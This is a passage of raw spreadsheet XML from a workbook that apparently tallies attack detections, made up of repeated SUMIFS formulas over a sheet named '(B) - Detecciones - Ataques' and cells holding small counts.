        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AU27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AU27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BK41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AV27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AV27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BL41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AW27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AW27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BM41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AX27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AX27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BN41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AY27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AY27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BO41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AZ27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AZ27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BP41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BA27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BA27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BQ41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BB27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BB27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BR41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BC27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BC27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BS41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BD27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BD27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BT41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BE27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BE27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BU41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BF27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BF27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BV41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BG27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BG27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BW41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BH27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BH27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BX41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BI27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BI27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BY41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BJ27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BJ27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="BZ41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BK27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BK27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CA41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BL27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BL27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CB41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BM27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BM27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CC41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BN27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BN27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CD41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BO27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BO27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CE41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BP27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BP27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CF41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BQ27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BQ27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CG41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BR27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BR27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CH41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BS27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BS27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CI41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BT27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BT27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CJ41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BU27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BU27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CK41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BV27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BV27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CL41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BW27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BW27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CM41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BX27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BX27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CN41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BY27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BY27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CO41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,BZ27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; BZ27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CP41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CA27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CA27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CQ41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CB27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CB27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CR41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CC27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CC27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CS41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CD27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CD27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CT41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CE27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CE27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CU41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CF27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CF27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CV41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CG27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CG27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CW41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CH27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CH27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CX41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CI27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CI27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CY41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CJ27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CJ27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="CZ41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CK27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CK27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="DA41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CL27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CL27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="DB41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CM27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CM27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="DC41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CN27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CN27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="DD41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CO27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CO27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="DE41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CP27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CP27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="DF41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CQ27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CQ27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="DG41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CR27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CR27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="DH41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CS27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CS27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="DI41" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CT27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CT27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="DJ41" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,CU27) + SUMIFS('(B) - Detecciones - Ataques'!$CS3:$CS139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; CU27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="DK41" s="271"/>
      <c r="DO41" s="279"/>
      <c r="DP41" s="419" t="s">
        <v>558</v>
      </c>
      <c r="DQ41" s="420">
        <v>1.0</v>
      </c>
      <c r="DR41" s="420">
        <v>2.0</v>
      </c>
      <c r="DS41" s="420">
        <v>2.0</v>
      </c>
      <c r="DT41" s="420">
        <v>2.0</v>
      </c>
      <c r="DU41" s="421">
        <v>2.0</v>
      </c>
      <c r="DV41" s="271"/>
      <c r="DW41" s="419" t="s">
        <v>558</v>
      </c>
      <c r="DX41" s="420">
        <v>1.0</v>
      </c>
      <c r="DY41" s="420">
        <v>2.0</v>
      </c>
      <c r="DZ41" s="420">
        <v>2.0</v>
      </c>
      <c r="EA41" s="420">
        <v>2.0</v>
      </c>
      <c r="EB41" s="421">
        <v>2.0</v>
      </c>
      <c r="EC41" s="271"/>
      <c r="ED41" s="280"/>
      <c r="EG41" s="279"/>
      <c r="EH41" s="271"/>
      <c r="EI41" s="419" t="s">
        <v>558</v>
      </c>
      <c r="EJ41" s="420">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI41,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S39 &amp; "*")</f>
        <v>2</v>
      </c>
      <c r="EK41" s="420">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BX$3:$BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI41,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!BX$3:BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI41 &amp; "*")</f>
        <v>14</v>
      </c>
      <c r="EL41" s="420">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI41,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI41 &amp; "*")</f>
        <v>24</v>
      </c>
      <c r="EM41" s="420">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI41,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI41 &amp; "*")</f>
        <v>48</v>
      </c>
      <c r="EN41" s="421">
        <f t="shared" si="4"/>
        <v>48</v>
      </c>
      <c r="EO41" s="271"/>
      <c r="EP41" s="271"/>
      <c r="EQ41" s="271"/>
      <c r="ER41" s="271"/>
      <c r="ES41" s="271"/>
      <c r="ET41" s="271"/>
      <c r="EU41" s="271"/>
      <c r="EV41" s="422" t="s">
        <v>558</v>
      </c>
      <c r="EW41" s="423">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="EX41" s="423">
        <f t="shared" si="9"/>
        <v>7</v>
      </c>
      <c r="EY41" s="423">
        <f t="shared" si="10"/>
        <v>12</v>
      </c>
      <c r="EZ41" s="424">
        <f t="shared" si="11"/>
        <v>24</v>
      </c>
      <c r="FA41" s="367"/>
